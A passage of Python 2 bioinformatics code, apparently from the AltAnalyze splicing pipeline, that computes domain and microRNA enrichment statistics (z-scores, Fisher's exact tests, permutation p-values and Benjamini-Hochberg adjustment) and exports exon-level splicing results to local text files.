gene_symbols = formatGeneSymbolHits(hit_count_db[element])
r = float(element_hit_gene_count) ###regulated genes associated with element
else: r = 0; gene_symbols = ''
try: z = zscore(r,n,N,R)
except Exception: z = 0; #print 'error:',element,r,n,N,R; kill
try: null_z = zscore(0,n,N,R)
except Exception: null_z = 0; #print 'error:',element,r,n,N,R; kill
zsd = ZScoreData(element,r,n,z,null_z,gene_symbols)
if element_type == 'domain': original_domain_z_score_data[element] = zsd
elif element_type == 'microRNA': original_microRNA_z_score_data[element] = zsd
permuted_z_scores[element] = [z]
if perform_element_permutation_analysis == 'no':
### The below is an alternative to the permute t-statistic that is more effecient
p = FishersExactTest(r,n,R,N)
zsd.SetP(p)
return N,R
######### Begin Permutation Analysis #######
def calculatePermuteZScores(permute_element_inputs,element_denominator_gene_count,N,R):
###Make this code as efficient as possible
for element_input_gene_count in permute_element_inputs:
for element in element_input_gene_count:
r = element_input_gene_count[element]
n = element_denominator_gene_count[element]
try: z = statistics.zscore(r,n,N,R)
except Exception: z = 0
permuted_z_scores[element].append(abs(z))
#if element == '0005488':
#a.append(r)
def calculatePermuteStats(original_element_z_score_data):
for element in original_element_z_score_data:
zsd = original_element_z_score_data[element]
z = abs(permuted_z_scores[element][0])
permute_scores = permuted_z_scores[element][1:] ###Exclude the true value
nullz = zsd.NullZ()
if abs(nullz) == z: ###Only add the nullz values if they can count towards the p-value (if equal to the original z)
null_z_to_add = permutations - len(permute_scores)
permute_scores+=[abs(nullz)]*null_z_to_add ###Add null_z's in proportion to the amount of times there were not genes found for that element
if len(permute_scores)>0:
p = permute_p(permute_scores,z)
else: p = 1
#if p>1: p=1
zsd.SetP(p)
def FishersExactTest(r,n,R,N):
a = r; b = n-r; c=R-r; d=N-R-b
table = [[int(a),int(b)], [int(c),int(d)]]
try: ### Scipy version - cuts down rutime by ~1/3rd the time
oddsratio, pvalue = stats.fisher_exact(table)
return pvalue
except Exception:
ft = fishers_exact_test.FishersExactTest(table)
return ft.two_tail_p()
def adjustPermuteStats(original_element_z_score_data):
#1. Sort ascending the original input p value vector. Call this spval. Keep the original indecies so you can sort back.
#2. Define a new vector called tmp. tmp= spval. tmp will contain the BH p values.
#3. m is the length of tmp (also spval)
#4. i=m-1
#5 tmp[ i ]=min(tmp[i+1], min((m/i)*spval[ i ],1)) - second to last, last, last/second to last
#6. i=m-2
#7 tmp[ i ]=min(tmp[i+1], min((m/i)*spval[ i ],1))
#8 repeat step 7 for m-3, m-4,... until i=1
#9. sort tmp back to the original order of the input p values.
spval=[]
for element in original_element_z_score_data:
zsd = original_element_z_score_data[element]
p = float(zsd.PermuteP())
spval.append([p,element])
spval.sort(); tmp = spval; m = len(spval); i=m-2; x=0 ###Step 1-4
while i > -1:
tmp[i]=min(tmp[i+1][0], min((float(m)/(i+1))*spval[i][0],1)),tmp[i][1]; i -= 1
for (adjp,element) in tmp:
zsd = original_element_z_score_data[element]
zsd.SetAdjP(adjp)
spval=[]
def permute_p(null_list,true_value):
y = 0; z = 0; x = permutations
for value in null_list:
if value >= true_value: y += 1
#if true_value > 8: global a; a = null_list; print true_value,y,x;kill
return (float(y)/float(x)) ###Multiply probabilty x2?
######### End Permutation Analysis #######
def exportZScoreData(original_element_z_score_data,element_type):
element_output = root_dir+'AltResults/AlternativeOutput/' + dataset_name + analysis_method+'-'+element_type+'-zscores.txt'
data = export.ExportFile(element_output)
headers = [element_type+'-Name','Number Changed','Number Measured','Percent Changed', 'Zscore','PermuteP','AdjP','Changed GeneSymbols']
headers = string.join(headers,'\t')+'\n'
data.write(headers); sort_results=[]
#print "Results for",len(original_element_z_score_data),"elements exported to",element_output
for element in original_element_z_score_data:
zsd=original_element_z_score_data[element]
try: results = [zsd.Changed(), zsd.Measured(), zsd.PercentChanged(), zsd.ZScore(), zsd.PermuteP(), zsd.AdjP(), zsd.AssociatedWithElement()]
except AttributeError: print element,len(permuted_z_scores[element]);kill
results = [element] + results
results = string.join(results,'\t') + '\n'
sort_results.append([float(zsd.PermuteP()),-1/float(zsd.Measured()),results])
sort_results.sort()
for values in sort_results:
results = values[2]
data.write(results)
data.close()
def getInputsForPermutationAnalysis(exon_db):
### Filter fold_dbase, which is the proper denominator
probeset_to_gene = {}; denominator_list = []
for probeset in exon_db:
proceed = 'no'
if filter_for_AS == 'yes':
as_call = exon_db[probeset].SplicingCall()
if as_call == 1: proceed = 'yes'
else: proceed = 'yes'
if proceed == 'yes':
gene = exon_db[probeset].GeneID()
probeset_to_gene[probeset] = gene
denominator_list.append(probeset)
return probeset_to_gene,denominator_list
def getJunctionSplicingAnnotations(regulated_exon_junction_db):
filter_status = 'yes'
########### Import critical exon annotation for junctions, build through the exon array analysis pipeline - link back to probesets
filtered_arrayids={}; critical_probeset_annotation_db={}
if array_type == 'RNASeq' and explicit_data_type == 'null':
critical_exon_annotation_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_exons.txt'
elif array_type == 'RNASeq' and explicit_data_type != 'null':
critical_exon_annotation_file = root_dir+'AltDatabase/'+species+'/'+array_type+'/'+species+'_Ensembl_junctions.txt'
else:
critical_exon_annotation_file = "AltDatabase/"+species+"/"+array_type+"/"+species+"_Ensembl_"+array_type+"_probesets.txt"
critical_exon_annotation_file = filename=getFilteredFilename(critical_exon_annotation_file)
for uid in regulated_exon_junction_db:
gene = regulated_exon_junction_db[uid].GeneID()
critical_exons = regulated_exon_junction_db[uid].CriticalExons()
"""### It appears that each critical exon for junction arrays can be a concatenation of multiple exons, making this unnecessary
if len(critical_exons)>1 and array_type == 'junction':
critical_exons_joined = string.join(critical_exons,'|')
filtered_arrayids[gene+':'+critical_exon].append(uid)"""
for critical_exon in critical_exons:
try:
try: filtered_arrayids[gene+':'+critical_exon].append(uid)
except TypeError: print gene, critical_exon, uid;kill
except KeyError: filtered_arrayids[gene+':'+critical_exon]=[uid]
critical_exon_annotation_db = importSplicingAnnotationDatabase(critical_exon_annotation_file,'exon-fake',filtered_arrayids,filter_status);null=[] ###The file is in exon centric format, so designate array_type as exon
for key in critical_exon_annotation_db:
ced = critical_exon_annotation_db[key]
for junction_probesets in filtered_arrayids[key]:
try: critical_probeset_annotation_db[junction_probesets].append(ced) ###use for splicing and Exon annotations
except KeyError: critical_probeset_annotation_db[junction_probesets] = [ced]
for junction_probesets in critical_probeset_annotation_db:
if len(critical_probeset_annotation_db[junction_probesets])>1: ###Thus multiple exons associated, must combine annotations
exon_ids=[]; external_exonids=[]; exon_regions=[]; splicing_events=[]
for ed in critical_probeset_annotation_db[junction_probesets]:
ensembl_gene_id = ed.GeneID(); transcript_cluster_id = ed.ExternalGeneID()
exon_ids.append(ed.ExonID()); external_exonids.append(ed.ExternalExonIDs()); exon_regions.append(ed.ExonRegionID()); se = string.split(ed.SplicingEvent(),'|')
for i in se: splicing_events.append(i)
splicing_events = unique.unique(splicing_events) ###remove duplicate entries
exon_id = string.join(exon_ids,'|'); external_exonid = string.join(external_exonids,'|'); exon_region = string.join(exon_regions,'|'); splicing_event = string.join(splicing_events,'|')
probe_data = AffyExonSTData(ensembl_gene_id, exon_id, external_exonid, '', exon_region, splicing_event, '','')
if array_type != 'RNASeq': probe_data.setTranscriptCluster(transcript_cluster_id)
critical_probeset_annotation_db[junction_probesets] = probe_data
else:
critical_probeset_annotation_db[junction_probesets] = critical_probeset_annotation_db[junction_probesets][0]
return critical_probeset_annotation_db
def determineExternalType(external_probeset_db):
external_probeset_db2={}
if 'TC' in external_probeset_db:
temp_index={}; i=0; type = 'JETTA'
for name in external_probeset_db['TC'][0]: temp_index[i]=i; i+=1
if 'PS:norm_expr_fold_change' in temp_index: NI_fold_index = temp_index['PS:norm_expr_fold_change']
if 'MADS:pv_1over2' in temp_index: MADS_p1_index = temp_index['MADS:pv_1over2']
if 'MADS:pv_2over1' in temp_index: MADS_p2_index = temp_index['MADS:pv_2over1']
if 'TC:expr_fold_change' in temp_index: MADS_p2_index = temp_index['MADS:pv_2over1']
if 'PsId' in temp_index: ps_index = temp_index['PsId']
for tc in external_probeset_db:
for list in external_probeset_db[tc]:
try: NI_fold = float(list[NI_fold_index])
except Exception: NI_fold = 1
try: MADSp1 = float(list[MADS_p1_index])
except Exception: MADSp1 = 1
try: MADSp2 = float(list[MADS_p2_index])
except Exception: MADSp1 = 1
if MADSp1<MADSp2: pval = MADSp1
else: pval = MADSp2
probeset = list[ps_index]
external_probeset_db2[probeset] = NI_fold,pval
else:
type = 'generic'
a = []; b = []
for id in external_probeset_db:
#print external_probeset_db[id]
try: a.append(abs(float(external_probeset_db[id][0][0])))
except Exception: null=[]
try: b.append(abs(float(external_probeset_db[id][0][1])))
except Exception: null=[]
a.sort(); b.sort(); pval_index = None; score_index = None
if len(a)>0:
if max(a) > 1: score_index = 0
else: pval_index = 0
if len(b)>0:
if max(b) > 1: score_index = 1
else: pval_index = 1
for id in external_probeset_db:
if score_index != None: score = external_probeset_db[id][0][score_index]
else: score = 1
if pval_index != None: pval = external_probeset_db[id][0][pval_index]
else: pval = 1
external_probeset_db2[id] = score,pval
return external_probeset_db2, type
def importExternalProbesetData(dataset_dir):
excluded_probeset_db={}; splice_event_list=[]; p_value_call={}; permute_p_values={}; gene_expression_diff_db={}
analyzed_probeset_db = {}
external_probeset_db = importExternalDBList(dataset_dir)
external_probeset_db, ext_type = determineExternalType(external_probeset_db)
for probeset in exon_db: analyzed_probeset_db[probeset] = []
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
if len(filtered_probeset_db)>0:
temp_db={}
for probeset in analyzed_probeset_db: temp_db[probeset]=[]
for probeset in temp_db:
try: filtered_probeset_db[probeset]
except KeyError: del analyzed_probeset_db[probeset]
### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing annotation)
if filter_for_AS == 'yes':
for probeset in exon_db:
as_call = exon_db[probeset].SplicingCall()
if as_call == 0:
try: del analyzed_probeset_db[probeset]
except KeyError: null=[]
for probeset in analyzed_probeset_db:
ed = exon_db[probeset]; geneid = ed.GeneID()
td = TranscriptionData('',''); gene_expression_diff_db[geneid] = td
if probeset in external_probeset_db:
exonid = ed.ExonID(); critical_exon_list = [1,[exonid]]
splicing_index,normIntensityP = external_probeset_db[probeset]
group1_ratios=[]; group2_ratios=[];exp_log_ratio=''; ttest_exp_p='';normIntensityP='';opposite_SI_log_mean=''
sid = ExonData(splicing_index,probeset,critical_exon_list,geneid,group1_ratios,group2_ratios,normIntensityP,opposite_SI_log_mean)
splice_event_list.append((splicing_index,sid))
else:
### Also record the data for probesets that are excluded... Used by DomainGraph
eed = ExcludedExonData(0,geneid,'NA')
excluded_probeset_db[probeset] = eed
print len(splice_event_list), 'pre-filtered external results imported...\n'
return splice_event_list, p_value_call, permute_p_values, excluded_probeset_db, gene_expression_diff_db
def splicingAnalysisAlgorithms(nonlog_NI_db,fold_dbase,dataset_name,gene_expression_diff_db,exon_db,ex_db,si_db,dataset_dir):
protein_exon_feature_db={}; global regulated_exon_junction_db; global critical_exon_annotation_db; global probeset_comp_db; probeset_comp_db={}
if original_conditions == 2: print "Beginning to run", analysis_method, "algorithm on",dataset_name[0:-1],"data"
if run_from_scratch == 'Annotate External Results':
splice_event_list, p_value_call, permute_p_values, excluded_probeset_db, gene_expression_diff_db = importExternalProbesetData(dataset_dir)
elif analysis_method == 'ASPIRE' or analysis_method == 'linearregres':
original_exon_db = exon_db
if original_conditions > 2:
splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db = ex_db
splice_event_list, p_value_call, permute_p_values, exon_db, regulated_exon_junction_db = furtherProcessJunctionScores(splice_event_list, probeset_comp_db, permute_p_values)
else:
splice_event_list, probeset_comp_db, permute_p_values, excluded_probeset_db = analyzeJunctionSplicing(nonlog_NI_db)
splice_event_list, p_value_call, permute_p_values, exon_db, regulated_exon_junction_db = furtherProcessJunctionScores(splice_event_list, probeset_comp_db, permute_p_values)
elif analysis_method == 'splicing-index':
regulated_exon_junction_db = {}
if original_conditions > 2:
excluded_probeset_db = ex_db; splice_event_list = si_db;
clearObjectsFromMemory(ex_db); clearObjectsFromMemory(si_db)
ex_db=[]; si_db=[]; permute_p_values={}; p_value_call=''
else: splice_event_list, p_value_call, permute_p_values, excluded_probeset_db = analyzeSplicingIndex(fold_dbase)
elif analysis_method == 'FIRMA':
regulated_exon_junction_db = {}
splice_event_list, p_value_call, permute_p_values, excluded_probeset_db = FIRMAanalysis(fold_dbase)
global permuted_z_scores; permuted_z_scores={}; global original_domain_z_score_data; original_domain_z_score_data={}
global original_microRNA_z_score_data; original_microRNA_z_score_data={}
nonlog_NI_db=[] ### Clear memory of this large dictionary
try: clearObjectsFromMemory(original_avg_const_exp_db); clearObjectsFromMemory(array_raw_group_values)
except Exception: null=[]
try: clearObjectsFromMemory(avg_const_exp_db)
except Exception: null=[]
try: clearObjectsFromMemory(alt_junction_db)
except Exception: null=[]
try: clearObjectsFromMemory(fold_dbase); fold_dbase=[]
except Exception: null=[]
microRNA_full_exon_db,microRNA_count_db,gene_microRNA_denom = ExonAnalyze_module.importmicroRNADataExon(species,array_type,exon_db,microRNA_prediction_method,explicit_data_type,root_dir)
#print "MicroRNA data imported"
if use_direct_domain_alignments_only == 'yes':
protein_ft_db_len,domain_associated_genes = importProbesetAligningDomains(exon_db,'gene')
else: protein_ft_db_len,domain_associated_genes = importProbesetProteinCompDomains(exon_db,'gene','exoncomp')
if perform_element_permutation_analysis == 'yes':
probeset_to_gene,denominator_list = getInputsForPermutationAnalysis(exon_db)
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
exon_gene_array_translation_file = 'AltDatabase/'+species+'/'+array_type+'/'+species+'_'+array_type+'-exon_probesets.txt'
try: exon_array_translation_db = importGeneric(exon_gene_array_translation_file)
except Exception: exon_array_translation_db={} ### Not present for all species
exon_hits={}; clearObjectsFromMemory(probeset_comp_db); probeset_comp_db=[]
###Run analyses in the ExonAnalyze_module module to assess functional changes
for (score,ed) in splice_event_list:
geneid = ed.GeneID()
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
pl = string.split(ed.Probeset1(),'|'); probeset1 = pl[0] ### When agglomerated, this is important
uid = (probeset1,ed.Probeset2())
else: uid = ed.Probeset1()
gene_exon = geneid,uid; exon_hits[gene_exon] = ed
#print probeset1,ed.Probeset1(),ed.Probeset2(),gene_exon,ed.CriticalExons()
dataset_name_original = analysis_method+'-'+dataset_name[8:-1]
global functional_attribute_db; global protein_features
### Possibly Block-out code for DomainGraph export
########### Re-import the exon_db for significant entries with full annotaitons
exon_db={}; filtered_arrayids={}; filter_status='yes' ###Use this as a means to save memory (import multiple times - only storing different types relevant information)
for (score,entry) in splice_event_list:
try: probeset = original_exon_db[entry.Probeset1()].Probeset()
except Exception: probeset = entry.Probeset1()
pl = string.split(probeset,'|'); probeset = pl[0]; filtered_arrayids[probeset] = [] ### When agglomerated, this is important
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
try: probeset = entry.Probeset2(); filtered_arrayids[probeset] = []
except AttributeError: null =[] ###occurs when running Splicing
exon_db = importSplicingAnnotationDatabase(probeset_annotations_file,array_type,filtered_arrayids,filter_status);null=[] ###replace existing exon_db (probeset_annotations_file should be a global)
###domain_gene_changed_count_db is the number of genes for each domain that are found for regulated probesets
if array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null'):
if use_direct_domain_alignments_only == 'yes':
protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetAligningDomains(regulated_exon_junction_db,'probeset')
else: protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetProteinCompDomains(regulated_exon_junction_db,'probeset','exoncomp')
else:
if use_direct_domain_alignments_only == 'yes':
protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetAligningDomains(exon_db,'probeset')
else: protein_features,domain_gene_changed_count_db,functional_attribute_db = importProbesetProteinCompDomains(exon_db,'probeset','exoncomp')
filtered_microRNA_exon_db = ExonAnalyze_module.filterMicroRNAProbesetAssociations(microRNA_full_exon_db,exon_hits)
microRNA_full_exon_db=[]
###add microRNA data to functional_attribute_db
microRNA_hit_gene_count_db = {}; all_microRNA_gene_hits={}; microRNA_attribute_db={}; probeset_mirBS_db={}
for (affygene,uid) in filtered_microRNA_exon_db: ###example ('G7091354', 'E20|') [('hsa-miR-130a', 'Pbxip1'), ('hsa-miR-130a', 'Pbxip1'
###3-1-08
miR_list = []
microRNA_symbol_list = filtered_microRNA_exon_db[(affygene,uid)]
for mir_key in microRNA_symbol_list:
microRNA,gene_symbol,miR_seq, miR_sources = mir_key
#if 'ENS' in microRNA: print microRNA; kill ### bug in some miRNA annotations introduced in the build process
specific_microRNA_tuple = (microRNA,'~')
try: microRNA_hit_gene_count_db[microRNA].append(affygene)
except KeyError: microRNA_hit_gene_count_db[microRNA] = [affygene]
###Create a database with the same structure as "protein_exon_feature_db"(below) for over-representation analysis (direction specific), after linking up splice direction data
try: microRNA_attribute_db[(affygene,uid)].append(specific_microRNA_tuple)
except KeyError: microRNA_attribute_db[(affygene,uid)] = [specific_microRNA_tuple]
miR_data = microRNA+':'+miR_sources
miR_list.append(miR_data) ###Add miR information to the record
function_type = ('miR-sequence: ' +'('+miR_data+')'+miR_seq,'~') ###Add miR sequence information to the sequence field of the report
try: functional_attribute_db[(affygene,uid)].append(function_type)
except KeyError: functional_attribute_db[(affygene,uid)]=[function_type]
#print (affygene,uid), [function_type];kill
if perform_element_permutation_analysis == 'yes':
try: probeset_mirBS_db[uid].append(microRNA)
except KeyError: probeset_mirBS_db[uid] = [microRNA]
miR_str = string.join(miR_list,','); miR_str = '('+miR_str+')'
function_type = ('microRNA-target'+miR_str,'~')
try: functional_attribute_db[(affygene,uid)].append(function_type)
except KeyError: functional_attribute_db[(affygene,uid)]=[function_type]
all_microRNA_gene_hits[affygene] = []
###Replace the gene list for each microRNA hit with count data
microRNA_hit_gene_count_db = eliminate_redundant_dict_values(microRNA_hit_gene_count_db)
###Combines any additional feature alignment info identified from 'ExonAnalyze_module.characterizeProteinLevelExonChanges' (e.g. from Ensembl or junction-based queries rather than exon specific) and combines
###this with this database of (Gene,Exon)=[(functional element 1,'~'),(functional element 2,'~')] for downstream result file annotatations
domain_hit_gene_count_db = {}; all_domain_gene_hits = {}; probeset_domain_db={}
for entry in protein_features:
gene,uid = entry
for data_tuple in protein_features[entry]:
domain,call = data_tuple
try: protein_exon_feature_db[entry].append(data_tuple)
except KeyError: protein_exon_feature_db[entry] = [data_tuple]
try: domain_hit_gene_count_db[domain].append(gene)
except KeyError: domain_hit_gene_count_db[domain] = [gene]
all_domain_gene_hits[gene]=[]
if perform_element_permutation_analysis == 'yes':
try: probeset_domain_db[uid].append(domain)
except KeyError: probeset_domain_db[uid] = [domain]
protein_features=[]; domain_gene_changed_count_db=[]
###Replace the gene list for each microRNA hit with count data
domain_hit_gene_count_db = eliminate_redundant_dict_values(domain_hit_gene_count_db)
############ Perform Element Over-Representation Analysis ############
"""Domain/FT Fishers-Exact test: with "protein_exon_feature_db" (transformed to "domain_hit_gene_count_db") we can analyze over-representation of domain/features WITHOUT taking into account exon-inclusion or exclusion
Do this using: "domain_associated_genes", which contains domain tuple ('Tyr_pkinase', 'IPR001245') as a key and count in unique genes as the value in addition to
Number of genes linked to splice events "regulated" (SI and Midas p<0.05), number of genes with constitutive probesets
MicroRNA Fishers-Exact test: "filtered_microRNA_exon_db" contains gene/exon to microRNA data. For each microRNA, count the representation in spliced genes microRNA (unique gene count - make this from the mentioned file)
Do this using: "microRNA_count_db"""
domain_gene_counts = {} ### Get unique gene counts for each domain
for domain in domain_associated_genes:
domain_gene_counts[domain] = len(domain_associated_genes[domain])
total_microRNA_gene_hit_count = len(all_microRNA_gene_hits)
total_microRNA_gene_denom_count = len(gene_microRNA_denom)
Nm,Rm = calculateZScores(microRNA_hit_gene_count_db,microRNA_count_db,total_microRNA_gene_denom_count,total_microRNA_gene_hit_count,'microRNA')
gene_microRNA_denom =[]
summary_data_db['miRNA_gene_denom'] = total_microRNA_gene_denom_count
summary_data_db['miRNA_gene_hits'] = total_microRNA_gene_hit_count
summary_data_db['alt_events']=len(splice_event_list)
total_domain_gene_hit_count = len(all_domain_gene_hits)
total_domain_gene_denom_count = protein_ft_db_len ###genes connected to domain annotations
Nd,Rd = calculateZScores(domain_hit_gene_count_db,domain_gene_counts,total_domain_gene_denom_count,total_domain_gene_hit_count,'domain')
microRNA_hit_gene_counts={}; gene_to_miR_db={} ### Get unique gene counts for each miR and the converse
for microRNA in microRNA_hit_gene_count_db:
microRNA_hit_gene_counts[microRNA] = len(microRNA_hit_gene_count_db[microRNA])
for gene in microRNA_hit_gene_count_db[microRNA]:
try: gene_to_miR_db[gene].append(microRNA)
except KeyError: gene_to_miR_db[gene] = [microRNA]
gene_to_miR_db = eliminate_redundant_dict_values(gene_to_miR_db)
if perform_element_permutation_analysis == 'yes':
###Begin Domain/microRNA Permute Analysis
input_count = len(splice_event_list) ### Number of probesets or probeset pairs (junction array) alternatively regulated
original_increment = int(permutations/20); increment = original_increment
start_time = time.time(); print 'Permuting the Domain/miRBS analysis %d times' % permutations
x=0; permute_domain_inputs=[]; permute_miR_inputs=[]
while x<permutations:
if x == increment: increment+=original_increment; print '*',
permute_input_list = random.sample(denominator_list,input_count); x+=1
permute_domain_input_gene_counts = countGenesForElement(permute_input_list,probeset_to_gene,probeset_domain_db)
permute_domain_inputs.append(permute_domain_input_gene_counts)
permute_miR_input_gene_counts = countGenesForElement(permute_input_list,probeset_to_gene,probeset_mirBS_db)
permute_miR_inputs.append(permute_miR_input_gene_counts)
calculatePermuteZScores(permute_domain_inputs,domain_gene_counts,Nd,Rd)
calculatePermuteZScores(permute_miR_inputs,microRNA_hit_gene_counts,Nm,Rm)
calculatePermuteStats(original_domain_z_score_data)
calculatePermuteStats(original_microRNA_z_score_data)
adjustPermuteStats(original_domain_z_score_data)
adjustPermuteStats(original_microRNA_z_score_data)
exportZScoreData(original_domain_z_score_data,'ft-domain')
exportZScoreData(original_microRNA_z_score_data,'microRNA')
end_time = time.time(); time_diff = int(end_time-start_time)
print "Enrichment p-values for Domains/miRBS calculated in %d seconds" % time_diff
denominator_list=[]
try: clearObjectsFromMemory(original_microRNA_z_score_data)
except Exception: null=[]
microRNA_hit_gene_count_db={}; microRNA_hit_gene_counts={};
clearObjectsFromMemory(permuted_z_scores); permuted_z_scores=[]; original_domain_z_score_data=[]
if (array_type == 'AltMouse' or ((array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null')) and analysis_method != 'splicing-index':
critical_probeset_annotation_db = getJunctionSplicingAnnotations(regulated_exon_junction_db)
probeset_aligning_db = importProbesetAligningDomains(regulated_exon_junction_db,'perfect_match')
else: probeset_aligning_db = importProbesetAligningDomains(exon_db,'perfect_match')
############ Export exon/junction level results ############
splice_event_db={}; protein_length_list=[]; aspire_gene_results={}
critical_gene_exons={}; unique_exon_event_db={}; comparison_count={}; direct_domain_gene_alignments={}
functional_attribute_db2={}; protein_exon_feature_db2={}; microRNA_exon_feature_db2={}
external_exon_annot={}; gene_exon_region={}; gene_smallest_p={}; gene_splice_event_score={}; alternatively_reg_tc={}
aspire_output = root_dir+'AltResults/AlternativeOutput/' + dataset_name + analysis_method+'-exon-inclusion-results.txt'
data = export.ExportFile(aspire_output)
goelite_output = root_dir+'GO-Elite/AltExon/AS.'+ dataset_name + analysis_method+'.txt'
goelite_data = export.ExportFile(goelite_output); gcn=0
#print 'LENGTH OF THE GENE ANNOTATION DATABASE',len(annotate_db)
if array_type != 'AltMouse':
DG_output = root_dir+'AltResults/DomainGraph/' + dataset_name + analysis_method+'-DomainGraph.txt'
DG_data = export.ExportFile(DG_output)
### Write out only the inclusion hits to a subdir
SRFinder_inclusion = root_dir+'GO-Elite/exon/' + dataset_name + analysis_method+'-inclusion.txt'
SRFinder_in_data = export.ExportFile(SRFinder_inclusion)
SRFinder_in_data.write('probeset\tSystemCode\tdeltaI\tp-value\n')
### Write out only the exclusion hits to a subdir
SRFinder_exclusion = root_dir+'GO-Elite/exon/' + dataset_name + analysis_method+'-exclusion.txt'
SRFinder_ex_data = export.ExportFile(SRFinder_exclusion)
SRFinder_ex_data.write('probeset\tSystemCode\tdeltaI\tp-value\n')
### Write out only the denominator set to a subdir
SRFinder_denom = root_dir+'GO-Elite/exon_denominator/' + species+'-'+array_type+'.txt'
SRFinder_denom_data = export.ExportFile(SRFinder_denom)
SRFinder_denom_data.write('probeset\tSystemCode\n')
ens_version = unique.getCurrentGeneDatabaseVersion()
ProcessedSpliceData_output = string.replace(DG_output,'DomainGraph','ProcessedSpliceData') ### This is the same as the DG export but without converting the probeset IDs for non-exon arrays
ProcessedSpliceData_data = export.ExportFile(ProcessedSpliceData_output)
if ens_version == '':
try:
elite_db_versions = UI.returnDirectoriesNoReplace('/AltDatabase')
if len(elite_db_versions)>0: ens_version = elite_db_versions[0]
except Exception: null=[]
ens_version = string.replace(ens_version,'EnsMart','ENS_')
DG_data.write(ens_version+"\n")
DG_data.write("Probeset\tGeneID\tRegulation call\tSI\tSI p-value\tMiDAS p-value\n")
ProcessedSpliceData_data.write("ExonID(s)\tGeneID\tRegulation call\t"+analysis_method+"\t"+analysis_method+" p-value\tMiDAS p-value\n")
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
if perform_permutation_analysis == 'yes': p_value_type = 'permutation-values'
else: p_value_type = 'FDR-'+p_value_call
if array_type == 'AltMouse': gene_name = 'AffyGene'; extra_transcript_annotation = 'block_structure'; extra_exon_annotation = 'splice_event_description'
if array_type == 'junction' or array_type == 'RNASeq':
gene_name = 'Ensembl'; extra_transcript_annotation = 'transcript cluster ID'; extra_exon_annotation = 'distal exon-region-ID'
goelite_data.write("GeneID\tSystemCode\tscore\tp-value\tSymbol\tExonIDs\n")
if array_type == 'RNASeq':
id1='junctionID-1'; id2='junctionID-2'; loc_column='exon/junction locations'
extra_transcript_annotation = 'Known/Novel Feature'
else: id1='probeset1'; id2='probeset2'; loc_column='probeset locations'
title = [gene_name,analysis_method,'symbol','description','exons1','exons2','regulation_call','event_call',id1,'norm-p1',id2,'norm-p2','fold1','fold2']
title +=['adj-fold1' ,'adj-fold2' ,extra_transcript_annotation,'critical_up_exons','critical_down_exons','functional_prediction','uniprot-ens_feature_predictions']
title +=['peptide_predictions','exp1','exp2','ens_overlapping_domains','constitutive_baseline_exp',p_value_call,p_value_type,'permutation-false-positives']
title +=['gene-expression-change', extra_exon_annotation ,'ExternalExonIDs','ExonRegionID','SplicingEvent','ExonAnnotationScore','large_splicing_diff',loc_column]
else:
goelite_data.write("GeneID\tSystemCode\tSI\tSI p-value\tMiDAS p-value\tSymbol\tExonID\n")
if analysis_method == 'splicing-index':
NIpval = 'SI_rawp'; splicing_score = 'Splicing-Index'; lowestp = 'lowest_p (MIDAS or SI)'; AdjPcolumn = 'Deviation-Value'; #AdjPcolumn = 'SI_adjp'
else:
NIpval = 'FIRMA_rawp'; splicing_score = 'FIRMA_fold'; lowestp = 'lowest_p (MIDAS or FIRMA)'; AdjPcolumn = 'Deviation-Value'; #AdjPcolumn = 'FIRMA_adjp'
if array_type == 'RNASeq':
id1='junctionID'; pval_column='junction p-value'; loc_column='junction location'
else: id1='probeset'; pval_column='probeset p-value'; loc_column='probeset location'
if array_type == 'RNASeq': secondary_ID_title = 'Known/Novel Feature'
else: secondary_ID_title = 'alternative gene ID'
title= ['Ensembl',splicing_score,'symbol','description','exons','regulation_call',id1,pval_column,lowestp,'midas p-value','fold','adjfold']
title+=['up_exons','down_exons','functional_prediction','uniprot-ens_feature_predictions','peptide_predictions','ens_overlapping_domains','baseline_probeset_exp']
title+=['constitutive_baseline_exp',NIpval,AdjPcolumn,'gene-expression-change']
title+=[secondary_ID_title, 'ensembl exons', 'consitutive exon', 'exon-region-ID', 'exon annotations','distal exon-region-ID',loc_column]
title = string.join(title,'\t') + '\n'
try:
if original_conditions>2: title = string.replace(title,'regulation_call','conditions_compared')
except Exception: null=[]
data.write(title)
### Calculate adjusted normalized intensity p-values
fdr_exon_stats={}
if analysis_method != 'ASPIRE' and 'linearregres' not in analysis_method:
for (score,entry) in splice_event_list: ### These are all "significant entries"
fds = FDRStats(entry.TTestNormalizedRatios())
fdr_exon_stats[entry.Probeset1()] = fds
for probeset in excluded_probeset_db: ### These are all "non-significant entries"
fds = FDRStats(excluded_probeset_db[probeset].TTestNormalizedRatios())
fdr_exon_stats[probeset] = fds
try: adjustPermuteStats(fdr_exon_stats)
except Exception: null=[]
### Calculate score average and stdev for each gene to alter get a Deviation Value
gene_deviation_db={}
for (score,entry) in splice_event_list:
dI = entry.Score(); geneID = entry.GeneID()
try: gene_deviation_db[geneID].append(dI)
except Exception: gene_deviation_db[geneID] = [dI]
for i in excluded_probeset_db:
entry = excluded_probeset_db[i]
try: dI = entry.Score(); geneID = entry.GeneID()
except Exception: geneID = entry[1]; dI = entry[-1]
try: gene_deviation_db[geneID].append(dI)
except Exception: None ### Don't include genes with no hits
for geneID in gene_deviation_db:
try:
avg_dI=statistics.avg(gene_deviation_db[geneID])
stdev_dI=statistics.stdev(gene_deviation_db[geneID])
gene_deviation_db[geneID] = avg_dI,stdev_dI
except Exception:
gene_deviation_db[geneID] = 'NA','NA'
event_count = 0
for (score,entry) in splice_event_list:
event_count += 1
dI = entry.Score(); probeset1 = entry.Probeset1(); regulation_call = entry.RegulationCall(); event_call = entry.EventCall();critical_exon_list = entry.CriticalExonTuple()
probeset1_display = probeset1; selected_probeset = probeset1
if agglomerate_inclusion_probesets == 'yes':
if array_type == 'AltMouse':
exons1 = original_exon_db[probeset1].ExonID()
